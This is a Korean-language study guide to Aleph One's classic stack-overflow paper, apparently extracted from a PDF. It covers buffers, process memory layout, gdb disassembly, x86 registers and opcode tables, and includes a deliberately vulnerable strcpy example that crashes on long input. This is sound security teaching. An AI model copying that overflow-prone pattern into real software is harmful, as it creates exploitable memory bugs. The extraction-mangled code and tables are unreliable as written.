Smashing The Stack For Fun And Profit by Aleph One

Size: px

Start display at page:

Download "Smashing The Stack For Fun And Profit by Aleph One"

가인 봉
6 years ago
Views:

1 Review of Aleph One s Smashing The Stack For Fun And Profit by vangelis([email protected]) d88b b. 8888b..d8888b d88b. 888d d88""88b "88b "88b d88p" P d8p Y8b 888p d K Y88b 888 d88p Y88..88P Y88b 888 d88p Y88b. 888 "88b Y8b. 888 "Y P" "Y88P" "Y P" "Y "Y8888P Y

2 Aleph One의 Smashing the Stack for Fun and Profit는버퍼오버플로우 (buffer overflow) 에대한문서로서는고전중의고전이된글이다. 실력있는해커가되기위해다방면의글을읽어야하는데, Aleph One의이글을읽지않고시스템해킹분야를공부한다는것은상상도할수없는일이다. 이글이쓰여져 Phrack에발표된것이 1996년 11월 8일이지만여전히그영향력은무시할수없는무게를지니고있다. 거의모든오버플로우관련글들이이문서를바탕으로쓰여졌고, 쓰여지고있는것을생각한다면이글의무게는미루어짐작할수있다. 그럼에도불구하고아직이문서에대해서자세한설명글이아직발표되지않은것은유감스러운일이다. 고전을읽는즐거움은커지만그고전을완벽하게이해하고분석한다는것은그렇게용이한일이아니다. 그이유는고전이가지고있는무게를분석글이감당하기에는너무버거운것이기때문이다. 그러나그런버거운부담에도불구하고이분석글을쓰고있는첫번째이유는필자개인의지적호기심을충족시키기위한것이고, 둘째는이글의독자들이좀더쉽게다가갈수있도록작은도움을주기위한것이다. 이글이고전이라면나름대로의준비과정을거치고읽는것이좋을것이다. 사전지식없이이글을읽게된다면그결과는뻔한것이다. 이글을제대로이해하기위해서는 기본적인어셈블리어 1 지식, 가상메모리에대한개념, gdb 의사용법 2, 그리고버퍼 (buffer) 에 대한확실한이해가필요하다. 물론 C언어와유닉스계열시스템에대한이해도필수적이다. 특히이글의모든테스트들이대부분 intel x86 CPU 3 와리눅스에서이루어진것이므로리눅스에대한이해도필수적이라하겠다. 각종책이나인터넷상으로구할수있는정보를이용하여먼저공부한후이글을읽어보는것이현명한선택이라고생각한다. 빨리가고싶거든여유있게시작하자! 우선이글은버퍼오버플로우에대해알아보는글이므로당연이버퍼 (buffer) 가무엇인지알아보고넘어가야한다. 버퍼는같은데이터형태를가진연속된컴퓨터메모리블록인데, 오버플로우를이야기할때는보통문자배열 (character array) 를말한다. 보통문자열을저장하기위한영역을확보하기위해배열이나 malloc() 함수등을사용하는것은잘알고있을것이다. 문자배열에대해서는따로설명할필요는없을것으로생각한다. C 언어의지극히기초부분이기때문에이에대한설명은하지않겠다. 하지만좀더깊은공부를위해서 1 참고 2 참고 3 참고 1

3 이글을읽는독자는반드시배열에대해서다시공부하자. 기초를다시공부한다고해서흠이될것은없다. 배열은 C 언어의다른변수들과마찬가지로정적 (static) 또는동적 (dynamic) 으로선언될수있다. 변수가선언된다 는것은메모리에특정데이터를받아들이는데필요한공간을할당받는다는것을의미한다. 변수 (variable) 라함은메모리내에독특한이름을가지고있는데이터저장영역을말한다는것을다들알고있을것이다. 변수는저장될데이터가초기화되거나프로그램실행시데이터가입력되는초기화되지않은변수가있다. 우리가다루는이글에서는문제가되는것들은대부분초기화되지않은변수들이며, 선언된변수를위해할당된공간에인수로데이터를입력받을수있는형태를보통가지고있다. 변수를분류하는방법에대해서는 C 언어의기초를가지고있는사람이라면잘알고있을것이므로변수의분류에대해서는별도설명은하지않겠다. 대신필요한부분이있다면설명을하도록하겠다. 정적변수는로딩시에데이터세그먼트 (segment) 4 에할당된다. 이에비해동적변수는실행시스택에할당된다. 즉, 소스코드를컴파일한후실행파일을실행시킬때인자로데이터를입력받게되는것이다. 이글의중심은동적버퍼의오버플로우, 즉, 스택기반의오버플로우에대한것이다. 다음은동적변수가사용되고있는예로서, 독자들도한눈에알수있듯이오버플로우취약점을가지고있는소스코드이다. 여기서문제가되는동적변수는 char buffer[10]; 부분이다. 변수 char buffer[10] 에는프로그램을실행할때데이터가입력되게된다. 그래서 동적이다 라는표현을사용하는것이다. 그런데이것이문제가되는것은 strcpy() 함수의사용때문임을알수있다. strcpy() 함수는메모리에할당된크기보다더많은데이터를입력할수있어오버플로우문제를일으킬수있는대표적인함수이다. 이에대해서는뒤에서좀더자세하게설명하도록하겠다. 다음은소스코드를작성하고, 컴파일하여프로그램을실행하고, 데이터를입력하며, 그결과오버플로우가발생하는과정을보여준다. [vangelis@localhost test]$ vi example.c <- 소스코드작성 #include <stdio.h> 4 데이터가주기억장치로들어오고나가는스와핑이일어날때, 데이터의크기가고정되어있는페이지와 는달리, 크기가가변적인데이터단위를말한다. 메모리관리에대한세부적인것은박장수님이쓴 리 눅스커널분석 2.4 라는책을읽기권한다. 사이트참조바람. 2

4 #include <string.h> main() { char buffer[10]; char str; printf("put strings into buffer:"); scanf("%s",&str); strcpy(buffer,str); [vangelis@localhost test]$ gcc -o example example.c <- 컴파일 [vangelis@localhost test]$./example <- 프로그램실행 Put strings into buffer :aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaa Segmentation fault <- 데이터입력 <- 오버플로우발생 [vangelis@localhost test]$ 프로세스메모리구성앞에서우리는버퍼에대해서간단히알아보았다. 그런데버퍼를제대로이해하기위해서는프로세스 (process) 5 가메모리에서어떻게구성되는지먼저이해를해야한다. Aleph One은그의글에서프로세스를설명하는데스택영역을제외하고는비교적간단하게프로세스의영역들에대해설명하고있다. 그리고도표또한마찬가지이다. 이것은그의글이스택오버플로우를중심으로설명하고있기때문이다. 필자는원문을충실이따르면서동시에메모리의다른영역에대해서도설명을덧붙일생각이다. 일반적으로프로세스는세영역으로나누어져있다. 그세영역은 text, data, stack이다. 5 process는컴퓨터내에서실행중인프로그램의 instance이다. 굳이쉽게생각하자면실행중인프로그램이라고하면되겠다. 리눅스와같은멀티유저환경에서는하나의프로그램에대해 2 개이상의프로세스가존재할수있다. 하나의프로그램은 5명의사용자들이공유하고있고, 그사용자들이그하나의프로그램을동시에사용하고있다면기본적으로사용자의수만큼의프로세스가존재할것이다. 이해가안된다면멀티유저환경하에서프로그램사용에대해공부하길바란다. 3

5 먼저 text 영역에대해알아보자. text 영역은인스트럭션 (instruction 프로그램의기계어코드 ) 들을포함하고있으며, 읽기전용이다. 읽기전용이기때문에이영역에쓰기를시도하면 Segmentation violation 또는 Segmentation fault가발생한다. Segmentation violation은특정영역에대한각종형태의침범의결과로발생하는것을의미한다. 여기서말한 각종형태의침범 에대해서는오버플로우를공부할때마다자주접하게될것이다. 이제 data 영역에대해서알아보자. 이영역은초기화된데이터와초기화되지않은데이터를포함하고있다. 정적변수 (static variable) 가이영역에저장되어있다. 우리가변수를몇가지종류로나누어공부해야하는이유는변수의범위가중요하기때문이다. 변수의범위는프로그램에서사용된각변수의유효한생명력, 메모리에서변수의값이보존되는기간과그변수를저장하기위한저장영역의할당및해제에영향을미치기때문이다. 프로그램에서사용되는각종함수들은각종데이터들을사용하는데, 이함수들이사용할데이터는변수에할당되어있거나프로그램실행시할당되는것들이다. 변수는크게외부변수와지역변수로구분할수있는데, main() 함수가시작되기전에선언된것이외부변수또는전역 (global) 변수라하고, 지역 (local) 변수는특정함수내에서선언된것을말한다. 로컬변수는기본적으로자동변수인데, 이것은변수가정의되어있는함수가호출될때마다변수의값을보존하지않는것을의미한다. 그러나함수가호출될때마다변수의값을보존하고자한다면 static이란키워드를이용하여정적변수 (static variable) 로정의해야한다. 정적변수는함수가처음호출될때초기화되고, 그값이그대로보존된다. 다음소스를컴파일하여실행해보자. 정적변수에대해쉽게알수있을것이다. [vangelis@localhost test]$ vi static.c #include <stdio.h> void func(void); main() { int c; for(c=0; c<5; c++) { printf("c 가 %d 일때, ", c); func(); return 0; void func(void) 4

6 { static int a = 0; int b = 0; printf("a=%d, b=%d\n", a++, b++); [vangelis@localhost test]$ gcc -o static static.c [vangelis@localhost test]$./static c가 0일때, a=0, b=0 c가 1일때, a=1, b=0 c가 2일때, a=2, b=0 c가 3일때, a=3, b=0 c가 4일때, a=4, b=0 위의소스에서변수 a 앞에 static이란키워드가붙어있다. 실행결과를보면 1씩더해져값이출력되고있다. 이것은처음초기화된이후부터값이보존되었기때문이다. 소스와이실행결과를보고도이해가되지않는사람은 C 언어에대해서먼저공부해야할것이다. data 영역을이야기할때함께이야기할것이 data와 bss이다. data와 bss 영역둘다전역변수에제공되며, 컴파일때할당된다. data 영역은초기화된정적 (static) 데이터를, bss 영역은초기화되지않은데이터를포함하고있다. 이영역은 brk 시스템호출 (system call) 6 에의해크기가변경될수있다. 만약이영역들의사용가능한메모리가고갈될경우실행중인프로세스가중단되고재실행되도록조절된다. 메모리가부족할경우프로세스는그임무를할수없기때문에다시충분한메모리공간을할당받아야하기때문이다. 새로운메모리는 data와 stack 세그먼트사이에추가된다. 리눅스에서메모리할당시스템은몇가지가있다. 그러나이글에서다룰내용은아닌것같다. 앞으로도이글의진행을위해필요한부분이나올경우에만언급하도록하겠다. 6 brk 은 sbrk 와함께호출된프로세스의데이터세그먼트을위해할당된공간의영역을동적으로변경하기위해사용된다. 이변경은프로세스의 break value 을다시세팅하고, 적절한양의공간을할당함으로써이루어진다. break value 는 data segment 의끝넘어처음으로할당된것의주소이다. 할당된공간은 break value 가증가하면서늘어난다. 새로할당된공간은 0 으로설정된다. 하지만, 만약같은메모리공간이같은프로세스에다시할당되면그것의내용은정의되어있지않다. 다음은 brk 의시놉시스 (synopsis) 이다. 시놉시스란간단한개요를의미한다. #include <unistd.h> int brk (void *endds); void *sbrk (ssize_t incr); 5

7 이제부터 Aleph One의글이 stack overflow를다루는것이므로스택에대해자세하게알아보도록하겠다. 그전에앞에서살펴보았던프로세스의메모리구성도를하나추가하도록하겠다. high address env string argv string env pointer argv pointer argc stack heap bss data text low adresses [ 표 1] 프로세스메모리구성도 위의도표에서 stack에서는화살표가아래로, heap영역에서는화살표가위를가리키고있다. 이것은스택이함수를호출할때인자나호출된함수의지역변수를저장하기위해아래방향으로크기가커진다 ( 보통스택은가상주소 0xC 로부터 아래로자란다 (grow down, 낮은메모리주소로자란다 ) 는표현을사용한다 ) 는것을의미하며, 반면프로그램수행중에 malloc() 이나 mfree() 라이브러리함수를이용해동적으로메모리공간을할당받을수 6

8 있는데, 이공간을 heap 영역이라한다. 힙영역은위의도표에서도알수있듯이데이터세그먼트의끝이후부분을차지한다. 힙영역은가상주소위방향으로자라기때문에위의도표에서화살표가위로향해있다. 위의도표를좀더잘이해하기위해다음프로그램을보고, 다음프로그램의각요소들이어디에위치하는지확인해보도록하자. 도표는단순화시켰다. 다음표와소스는 리눅스매니아를위한커널프로그래밍 ( 조유근외 2명지음, 교학사 ) 이라는책을참고했다. #include <stdio.h> int a,b; int global_variable = 3; char buf[100]; main(int argc, char *argv[]) { int i=1; int local_variable; a=i+1; printf( a=%d\n,a); 커널공간 (kernel space) kernel 높은 메모리주소 stack argc, argv, i, local_variable 사용자공간 (user space) data a, b, global_variable 낮은 메모리주소 text a=i+1; printf( a=%d n,a); 7

9 스택이란무엇인가스택은컴퓨터과학에서자주사용되는추상적인데이터타입이다. 추상적인데이터타입이기때문에눈을통해입체적으로확인할수는없다. 그래서독자들은스택의구조와그용도에대해추상성을전제로하고공부를할필요가있다. 스택의경우, 스택에위치한마지막오브젝트가먼저제거되는속성을지니고있다. 이속성을보통 last in first out queue, 또는 LIFO라고지칭된다. 몇가지오퍼레이션이스택에정의되어있다. 가장중요한것중두가지가 PUSH와 POP이다. PUSH는스택의꼭대기에요소를더하고, POP은반대로스택의꼭대기에있는마지막요소를제거함으로써스택의크기를줄인다. 필수적인오퍼레이션을이해하기위해기본적인어셈블리어공부가필요하다. 어셈블리어는컴퓨터에대해직접적인통제를할수있도록해주는언어이다. 어셈블리어에대한정보는인터넷상에서도많이구할수있으며, 가장대표적인사이트가 초보자들이볼만한책으로는 BOB Neveln이쓴 Linux Assembly Language Programming을권한다. 번역이되어나왔는지모르겠다. 영어실력이된다면원서를볼것을권한다. 왜스택을사용하는가? 현대컴퓨터들은높은수준의언어들을염두에두고고안되었다. 높은수준의언어들에 의해도입된프로그램들을구조화하기위한가장중요한테크닉은프로시저 (procedure) 7 또는 함수 (function) 이다. 하나의관점에서보면프로시저호출은 jump 8 가하는것과같이통제흐름을변경할수있다. 하지만 jump와는달리프로시저가그것의임무를수행하는것을끝마쳤을때함수는그호출을뒤따르는문장 (statement) 또는명령 (instruction) 에게통제권을리턴한다. 이것은 gdb를이용해함수호출과정을살펴보면쉽게알수있다. 다음간단한소스를이용해이과정을알아보도록하자. [vangelis@localhost test]$ cat > e.c 7 프로그래밍에서 procedure 란함수 (function) 와거의유사한뜻으로사용된다. 함수는일정한동작을수행하고, 함수를호출한프로그램에리턴값 ( 결과값 ) 을돌려주는프로그래밍언어의독립적인코드이다. C 언어나다른종류의언어를공부한사람이라면굳이설명할필요도없을것이다. 프로그래밍이아닌일반적인상황에서프로시저는어떤임무를수행하기위한일련의작업절차를의미한다. 8 프로그램내에서프로세스를다른위치로전환시키는것으로써, branch 한다고도말하는데, 어셈블리어에서대표적인명령어가 jmp 이다. jmp 는 C 언어의함수와는달리리턴정보를기록하지는않는다. 8

10 #include <stdio.h> int a, b, c; int function(int, int); main() { printf("input a number for a: "); scanf("%d",&a); printf("input a number for b: "); scanf("%d",&b); c=function(a,b); printf("the value of a+b is %d", c); return 0; int function(int a, int b) { c=a+b; [vangelis@localhost test]$ gcc -o e e.c [vangelis@localhost test]$ gdb e GNU gdb 5.3 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"... disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %esp,%ebp 0x <main+3>: sub $0x8,%esp 0x <main+6>: sub $0xc,%esp 9

11 0x <main+9>: push $0x x804849e <main+14>: call 0x <printf> 0x80484a3 <main+19>: add $0x10,%esp 0x80484a6 <main+22>: sub $0x8,%esp 0x80484a9 <main+25>: push $0x x80484ae <main+30>: push $0x80485af 0x80484b3 <main+35>: call 0x <scanf> 0x80484b8 <main+40>: add $0x10,%esp 0x80484bb <main+43>: sub $0xc,%esp 0x80484be <main+46>: push $0x80485b2 0x80484c3 <main+51>: call 0x <printf> 0x80484c8 <main+56>: add $0x10,%esp 0x80484cb <main+59>: sub $0x8,%esp 0x80484ce <main+62>: push $0x804970c 0x80484d3 <main+67>: push $0x80485af 0x80484d8 <main+72>: call 0x <scanf> 0x80484dd <main+77>: add $0x10,%esp 0x80484e0 <main+80>: sub $0x8,%esp 0x80484e3 <main+83>: 0x80484e9 <main+89>: pushl 0x804970c pushl 0x x80484ef <main+95>: call 0x804851c <function> 0x80484f4 <main+100>: add $0x10,%esp 0x80484f7 <main+103>: mov %eax,%eax 0x80484f9 <main+105>: mov %eax,0x x80484fe <main+110>: sub $0x8,%esp 0x <main+113>: pushl 0x x <main+119>: push $0x80485c9 0x804850c <main+124>: call 0x <printf> 0x <main+129>: add $0x10,%esp 0x <main+132>: mov $0x0,%eax 0x <main+137>: leave 10

12 0x804851a <main+138>: 0x804851b <main+139>: ret nop End of assembler dump. disas function Dump of assembler code for function function: 0x804851c <function>: push %ebp 0x804851d <function+1>: mov 0x804851f <function+3>: mov 0x <function+6>: add 0x <function+9>: mov 0x804852a <function+14>: pop %esp,%ebp 0xc(%ebp),%eax 0x8(%ebp),%eax %eax,0x %ebp 0x804852b <function+15>: ret 0x804852c <function+16>: nop 0x804852d <function+17>: nop 0x804852e <function+18>: nop 0x804852f <function+19>: nop End of assembler dump. 이결과를보면어떤특정한과정과명령을통해각함수들이호출되고있는것을알수있다. 이특정한과정에대해서는 shellcode 섹션에서상세하게알아볼것이다. 이높은수준의추상성은스택이란개념이있기때문에구현될수있는것이다. 또한함수에서사용되는로컬변수를위한공간을동적으로할당하고, 함수에파라미터 (parameter) 9 를건네주고, 그함수로부터리턴값을돌려주기위해사용되기도한다. 9 파라미터 (parameter 매개변수또는인자 ) 는함수의헤더에포함되는내용으로, 아규먼트 (argument - 인수 ) 에대응하여영역을확보하는역할을한다. 함수의파라미터는고정적인것이므로프로그램이실행되는동안변하지않는다. 이에반해아규먼트는함수를호출하는프로그램에의해서함수로전달되는실제값이다. 함수가호출될때다른인수값이전달될수있다. 함수는인수에대응하는파라미터의이름을통해값을받아들인다. 앞에서제시했던 e.c의소스코드의 int function(int a, int b) 에서파라미터는 a와 b이다. 그리고아규먼트는프로그램실행시입력될 a와 b의데이터 (int형숫자 ) 이다. 11

13 스택영역이제부터스택영역에대해서좀더자세히알아보자. 다시강조하지만 Aleph One의글이다루는분야는오버플로우중에서도스택오버플로우이다. 스택은데이터를포함하고있는메모리의연속된블록이다. 연속된블록이라는것은스택이파편적으로흩어져있는것이아니라메모리에서특정한위치를연속적으로차지하고있다는것을의미한다. 블록 (block) 은주기억장치의기억공간의물리적구조와는관계없이연속된정보를의미하는데, 주로입출력시에사용되는하나의입출력명령에의해이동되는정보의단위이다. SP(stack pointer) 라는레지스터 (register) 가스택의꼭대기를가리키고있다. 스택의바닥은고정된주소에있다. 스택의크기는프로그램실행시커널에의해동적으로조정되는데, 이것은데이터의크기와관련되어있기때문이다. 이것에대해서는앞에서메모리할당시스템에대해이야기할때언급했었다. 여기서우리는레지스터에대해먼저알아볼필요는느끼게된다. 먼저레지스터에대해간단히알아본후다음부분으로넘어가자. 컴퓨터시스템에서제일중요한기능을하는부분이바로 CPU이다. 이것은 CPU가연산을포함해직접적인역할을다하기때문이다. CPU는프로그램을수행하는장치로서 instruction의수행기능가질뿐만아니라 instruction들의수행순서를제어하는기능을가지고있다. 이런한기능을수행하기위해 CPU는연산장치 (ALU), 레지스터와플래그 (flag), 내부버스 (internal bus), 제어장치 (CU) 와같은하드웨어요소를가지고있다. 우리가지금알아보는것이레지스터이므로레지스터와관련된것만집중적으로알아보도록하겠다. 다음내용의일부분은 컴퓨터구조화 ( 조정완저 ) 라는책을참고했다. 미리말해둘것은모든부분을그대로옮길수필요성을느끼지못했기때문에약간의통일성이떨어지고, 내용이빈약할수있다. 그러니이글을읽는독자들은좀더자세히설명되어있는책이나자료를참고하길바란다. 이글은레지스터자체에대한설명글이아니라는것을염두에두길바란다. 레지스터 (register) 는정보저장기능을가진요소로서데이터나주소를기억시키는데필요하며, 플래그는연산결과의상태를나타내는데사용된다. 레지스터는직렬로연결된플립-플롭 (flip-flop) 이나래치 (latch) 로구성되어있다. 간단히정리하면다음과같은특징을레지스터는가지고있다. 프로그램의수행에필요한정보나수행중에발생하는정보를기억하는장소이다. 레지스터에기억된정보는주기억장치에기억시킨후에디스크에기억시켜야한다. 정보를기억시키거나기억된정보를이용하기위해서는주소를사용하여지정해야한다. 레지스터지정에사용되는주소를레지스터주소혹은레지스터번호라고한다. 12

14 이제레지스터의종류에대해알아보자. 레지스터를분류하는방법에는두가지가있는데, 첫번째는 프로그래머가레지스터에기억된내용을변경시키거나기억된내용을사용할수 있는가시레지스터 (visible register) 와그렇지않은불가시레지스터 (invisible register) 로나눌수있다. 가시레지스터에는연산레지스터, 인덱스레지스터, 프로그램주소카운터레지스터가있고, 불가시레지스터는인스트럭션레지스터 (instruction register), 기억장치주소레지스터 (memory address register: MAR), 그리고기억장치버퍼 ( 데이터 ) 레지스터 (memory buffer(data) register: MBR(MDR)) 가있다. 둘째분류방법은레지스터에기억시키는정보의종류에따라분류하는방법이다. 이분류에의한종류는데이터레지스터 (data register), 주소레지스터 (address register), 그리고상태레지스터 (status register) 가있다. 우리가이글을다루면서주로살펴보아야할것은데이터레지스터이다. 데이터레지스터는함수연산기능의 instruction의수행시사용되는데이터를기억시키는레지스터이다. 그래서데이터레지스터에는수, 논리값, 문자들이기억될수있다. 데이터레지스터에는 AC(accumulator: 연산전담레지스터 ), GPR(general purpose register: 범용레지스터 ), 스택 (stack) 등이있다. 우리는여기서스택에대해서만알아보기로한다. 다른것들은관련책이나문서들을참고하길바란다. 스택은기억된정보를처리하는순서가특수한구조로, 스택에기억되는역순서로처리되는구조이다. 스택을레지스터로구현할때는적어도 2개이상의데이터레지스터가필요한데, 반드시주소레지스터인스택포인터 (stack pointer) 가필요하다. 여기서주소레지스터는기억된정보에접근하는데필요한정보인주소를기억하는레지스터를말한다. 스택포인터레지스터는스택의최상단, 즉, 최근스택에입력된데이터위치의주소를기억하고있다. 스택에데이터를기억시킬때스택포인터 SP를 1 증가시키고그것이지정하는위치에기억시킨다. 그리고스택에기억된데이터를처리하기위해접근할때는 SP가지정하는곳에기억된데이터에접근한후스택포인터는 1 감소된다. Aleph One의글로다시돌아가기전에우리가공부하는데도움이될수있는부분에대해다음과같이레지스터에대해간단히정리해보자. 레지스트는크게 4 부분으로나눌수있으며, 각이름앞에붙어있는 e 는 extended 를의미한다. 즉, 16 비트구조에서 32 비트구조로확장되었다는것을의미하는것이다. 참고로여기서는 x86 시스템을기준으로하고있다. 1. 일반적인레지스트 : data를주로다루는레지스트로, %eax, %ebx, %ecx, %edx 등이있다. 2. 세그먼트레지스트 : 메모리주소의첫번째부분을가지고있는레지스트로, 16비 13

15 트 %cs, %ds, %ss 등이있다. 3. offset 레지스트 : 세그먼트레지스트에대한 offset을가리키는레지스트이다. %eip(extended instruction pointer): 다음에실행될명령어에대한주소 %ebp(extended base pointer): 함수의지역변수를위한환경이시작되는곳 %esi(extended source index): 메모리블록을이용한연산에서데이터소스 offset 을가지고있다. %edi(extended destination index): 메모리블록을이용한연산에서목적지데이터 offset을가지고있다. %esp(extended stack pointer): 스택의꼭대기를가리킨다. 4. 특별한레지스트 : CPU에의해서사용되는레지스트이다. Theo Chakkapark 는레지스터와 Intel x86 Assembly OPCode 를다음과같이정리 10 하고 있으며, 이것은많은도움이되리라생각된다. 범용레지스터 (General Purpose Registers) Name 32-Bit 16-Bit Accumulator EAX AX Base Register EBX BX Count Register ECX CX Data Register EDX DX Stack Pointer ESP SP Base Pointer EBP BP Source Index ESI SI Destination Index EDI DI Flags Register EFlags Flags Instruction Pointer EIP IP 세그먼트레지스터 (Segment Registers) Name Register 10 참고 14

16 Code Segment Data Segment Stack Segment Extra Segment CS DS SS ES FS GS EFlags Register Bit Flag Desc Bit Flag Desc 0 CF Carry Flag 16 RF Resume Flag 1 1 None 17 VM Virtual-8086 Mode 2 PF Parity Flag 18 AC Alignment Check 3 0 None 19 VIF Virtual Interrupt Flag 4 AF Aux. Carry 20 VIP Virtual Interrupt Pending 5 0 None 21 ID Identification Flag 6 ZF Zero Flag 22 7 SF Sign Flag 23 8 TF Trap Flag 24 9 IF Interrupt Enable Flag DF Direction Flag 26 0 None 11 OF Overflow Flag IOPL I/O Privilege Level NT Nested Task None 31 오퍼랜드축약 (Operand Abbreviations) 축약 acc dst src reg segreg imm mem gdt 의미 Register AL, AX, or EAX A register or memory location A register, memory location, or a constant Any register other than a segment register Visible part of CS, DS, SS, ES, FS, or GS A constant A memory location Global Descriptor Table 15

17 idt Interrupt Descriptor Table port An input or output port 이동명령 (Movement Instructions) OPCode Operation MOV dst src dst «src reg16 src8 MOVZX reg32 src8 reg «zero-extended src reg32 src16 reg16 src8 MOVSX reg32 src8 reg «sign-extended src reg32 src16 LEA reg32 mem reg32 «offset(mem) XCHG dst src temp «dst; dst «src; src «temp 스택명령 (Stack Instructions) OPCode Operation BYTE imm8 ESP «ESP - 4; mem32[esp] «sign-extended imm8 WORD imm16 ESP «ESP - 2; mem16[esp] «imm16 PUSH DWORD imm32 ESP «ESP - 4; mem32[esp] «imm32 src16 src32 ESP «ESP - sizeof(src); mem[esp] «src segreg src16 dst«mem[esp]; ESP «ESP + sizeof(dst) POP src32 segreg PUSHF None ESP «ESP - 4; mem32[esp] «EFlags POPF None EFLAGS «mem32[esp]; ESP «ESP + 4 PUSHA None Pushes EAX, ECX, EDX, EBX, orig. ESP, EBP, ESI, EDI POPA None Pops EDI, ESI, EBP, ESP (discard), EBX, EDX, ECX, EAX Enter imm16, 0 Push EBP, EBP «ESP; ESP «ESP - imm16 Leave None ESP «EBP; pop EBP 가감명령 (Addition Instructions) OPCode Operation Flags ADD dst src dst «dst + src OF, SF, ZF, AF, CF, PF ADC dst src dst «dst + src + CF 16

18 SUB dst src dst «dst - src SBB dst src dst «dst - src -CF CMP dst src dst «src; numeric result discarded INC dst dst «dst + 1 OF, SF, ZF, AF, PF DEC dst dst «dst - 1 NEG dst dst «-dst OF, SF, ZF, AF, PF; CF=0 iif dst is 0. 곱하기및나누기명령 (Multiply and Divide Instructions) OPCode Operation Comment Flags MUL IMUL DIV IDIV src8 src16 src32 src8 src16 src32 src8 src16 src32 src8 src16 src32 AX «AL x src8 DX.AX «AX x src16 EDX.EAX «EAX x src32 AX «AL x src8 DX.AX «AX x src16 EDX.EAX «EAX x src32 AL«quotient(AX / src8) AX «quotient(dx.ax / src16) EAX «quotient(edx.eax / src32) AL«quotient(AX / src8) AX «quotient(dx.ax / src16) EAX «quotient(edx.eax / src32) Use MUL with unsigned operands. Use IMUL with signed operands. Use DIV with unsigned operands. Use IDIV with signed operands. CBW None AX «Sign-extended AL None None CWD None DX.AX «Sign-extended AX None None CDQ None EDX.EAX «Sign-extended EAX None None CWDE None EAX «Sign-extended AX None None Sets CF & 0F if product overflows lower half OF, SF, ZF, AF, CF, PF become undefined Bitwise Instructions OPCode Operation Flags AND dst src dst «dst & src OR dst src dst«dst & src XOR dst src dst «dst ^ src TEST dst src dst & src; bitwise result discarded NOT dst dst «~dst None SF, ZF, PF; (OF, CF are cleared, AF becomes undefined) 17

19 Jump Instructions OPCode Label Operation Comment Flags JMP label Jump to label None JA / JNBE label Jump if above / Jump if not below or equal JAE / JNB label JBE / JNA label JB / JNAE label JG / JNLE label JGE / JNL label JLE / JNG label JL / JNGE label Jump if above or equal / Jump if not below Jump if below or equal / Jump if not above Jump if below / Jump if not above or equal Jump if greater / Jump if not less or equal Jump if greater or equal / Jump if not less Jump if less or equal / Jump if not greater Jump if less / Jump if not greater or equal JE / JZ label Jump if equal / Jump if zero (ZF = 1) JNE / JNZ label Jump if not equal / not zero (ZF = 0) JC label Jump if CF = 1 None JNC label Jump if CF = 0 None JS label Jump if SF = 1 None JNS label Jump if SF = 0 None Use when comparing unsigned operands. Use when comparing signed operands Equality comparisons None 이제다시 Aleph One의글로돌아가자. 앞의첫문단에이어두번째문단으로부터시작한다. 여기서는앞에서다루었던내용이반복되어나올수있으나괘념치말고보길바란다. 스택은어떤함수를호출할때 push되고, 함수의역할을마치고리턴할때 pop되는논리적스택구조로구성되어있다. 이것은앞에서프로그램을 gdb를이용했을때의결과에서보았던내용이며, 뒤에서도좀더자세히다룰것이다. 이스택프레임은함수에대한파라미터, 로컬변수, 그리고함수호출시에 IP(instruction pointer) 의값을포함하여이전스택프레임을복구하기위해필요한데이터를가지고있다. 이역시앞에서도표를통해확인했던내용이다. 혹시라도혼란스럽다면앞부분을다시보길바란다. 스택을구현하는방법에따라스택이아래로자라거나 ( 낮은메모리주소쪽으로 ) 위로자랄수있는데, Aleph One의글에서는 Intel x86 CPU와리눅스시스템을테스트용으로사용하고있고, Intel x86 CPU 계열은아래로자라는스택을구현하고있다. 이와같은구현방법을 사용하고있는것이 Motorola, SPARC, 그리고 MIPS 11 등이다. 필자는 Motorola 와 MIPS CPU 를 사용해본적이없다. 사용해본적이없기때문에무책임한발언은하지않겠다. 혹시라도 11 프랙 56 호 Writing MIPS/IRIX Shellcode ( 참고. 18

20 관심이있는독자라면개별적으로확인해보기바란다. 그리고 SPARC 시스템의스택과레지스터에대해좀더많이알고싶은독자는 Understanding stacks and registers in the Sparc architecture(s) 12 라는글을참고하길바란다. 스택포인터 (SP, stack pointer) 또한스택과마찬가지로구현방법에따라아키텍처별로다를수있다. 그러나이글은 Intel x86 CPU를기준으로하고있다고했기때문에스택상의마지막주소를 SP가가리킨다는것을염두에두고글을읽어야겠다. 다음은프레임포인터 (FP, frame pointer) 에대해알아보자. 스택의꼭대기를가리키는레지스터 SP이외에스택을구현하기위해프레임포인터 (FP, frame pointer) 가사용된다. FP는논리적인스택프레임에서고정된위치를가리키고있다. 고정된위치를가리키고있기때문에 SP에비해또다른편이성이있다. 원리상지역변수는 SP로부터오프셋 (offset) 13 을줌으로써참조될수있다. 하지만 word 단위로각종데이터가스택에 push 또는 pop되기때문에오프셋이변한다. 어떤경우에는컴파일러가스택에들어가는데이터의 word 수를추적할수있지만그렇지않을수도있다. 그리고인텔기반의프로세서와같은몇몇프로세서에서는 SP로부터알려진거리에있는어떤변수에접근하는것은많은명령 (instruction) 들이필요한다. 이런이유들때문에지역변수와파라미터를참조하기위해많은컴파일러들은제 2의레지스터 FP를사용한다. 이것은 FP로부터의거리가 push와 pop이되도변하지않기때문이다. 인텔 CPU에서는이 FP 기능을하는것이 BP(EBP) 이다. 이글이다루고있는인텔 CPU의경우스택이아래로자란다고앞에서이야기했는데, 이것때문에실제파라미터는 FP로부터양수의오프셋을가지고, 지역변수는음의오프셋을가진다. 이에대해서는아래에서다룰 function() 이라는함수가호출될때스택의모양을보면알수있다. 다시한번더이부분에대해설명하도록하겠다. 어떤프로시저가호출될때처음으로하는것은이전의프레임포인터 (FP) 를저장하는것이다. 이전프레임포인터를저장하는것은프로시저가 exit될때원상태를복원하기위해서이다. 프로시저가 exit되었는데원상태로복원되지않는다면불필요한메모리사용으로이어질것이다. 그다음단계는새로운프레임포인터를만들기위해스택포인터 (SP) 를프레임포인터로복사하며, 지역변수를위한공간을확보하기위해스택포인터에서사용되는변수의크기만큼뺀다. 이과정을보통 procedure prolog라고부른다. 이에비해프로시저가 offset 은기준이되는주소로부터또다른주소를만들때그기준이되는주소에더해지는값을의미 한다. 